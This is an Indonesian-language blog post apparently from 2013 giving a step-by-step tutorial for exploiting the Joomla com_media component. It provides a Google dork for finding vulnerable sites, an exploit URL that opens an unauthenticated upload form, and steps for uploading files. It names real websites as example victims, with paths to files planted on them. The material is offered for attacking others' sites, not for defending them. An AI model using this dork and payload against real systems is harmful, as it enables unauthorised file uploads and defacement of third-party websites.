Rabu, 15 Mei 2013

Teknik Exploit Com_Media pada CMS Joomla

Posted by Erza Jullian 13.15, under | No comments

Teknik Exploit Com_Media pada CMS Joomla - Kali ini saya akan share salah satu cara exploit pada CMS Joomla yaitu Exploit com_media. Teknik ini saya dapet saat baca-baca blog salah satu member ISD, yaitu SultanHaikal. Namun sayang sekarang blognya sudah dihapus. Jadi saya mencoba berbagi ulang disini.

Oke, langsung saja.

Bahan-bahan :

Dork : inurl:com_media site:com [dork silahkan kreasikan sendiri. Kraetfitas anda yang akan menetukan banyaknya situs vuln]. :p

Exploit : /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=



1. Oke. Langsung berburu target di google dengan dork diatas. Sebagai contoh, saya pilih http://www.skylinepark.org . 

2. Lalu masukkan exploitnya. Jadi http://www.skylinepark.org/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

3. Maka kalian akan melihat tempat upload. Lihat SS :





4. Yang bisa diupload adalah file .txt .jpg .gif .png. Untuk html dan php tidak bisa. :p . Saya coba upload file .txt

5. Sekarang, kita lihat hasilnya. Letak filenya di [localhost]/images/[file.txt].

Ex : http://www.skylinepark.org/images/lol.txt, http://www.magicrete.in/images/lol.txt

6. Done.



Refrensi : http://komandanseo.blogspot.com/

0 komentar:

Posting Komentar

Blog Archive

Blog Archive